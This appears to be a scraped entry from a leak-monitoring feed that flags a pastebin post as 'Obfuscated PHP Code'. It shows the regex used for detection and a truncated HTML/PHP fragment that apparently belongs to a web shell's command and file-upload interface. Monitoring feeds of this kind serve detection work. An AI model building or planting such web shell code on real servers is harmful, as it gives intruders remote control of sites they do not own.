Quantcast
Channel: pastebin.com – LeakedIn
Viewing all articles
Browse latest Browse all 2834

Potential leak of data: Obfuscated PHP Code

$
0
0
Detected 1 occurrence(s) of ‘\?php.*(eval|urldecode)\(.*\>’: t.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td> </tr> <tr> <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td> </tr> </table> </form> <!-- End Of Commands Alias--> </td> <td width='30%' height='30' valign="top"> <!-- Commands Alias--> <form method='POST' enctype="multipart/form-data"> <ta Source: http://pastebin.com/raw.php?i=CRSTMPEH

Viewing all articles
Browse latest Browse all 2834

Trending Articles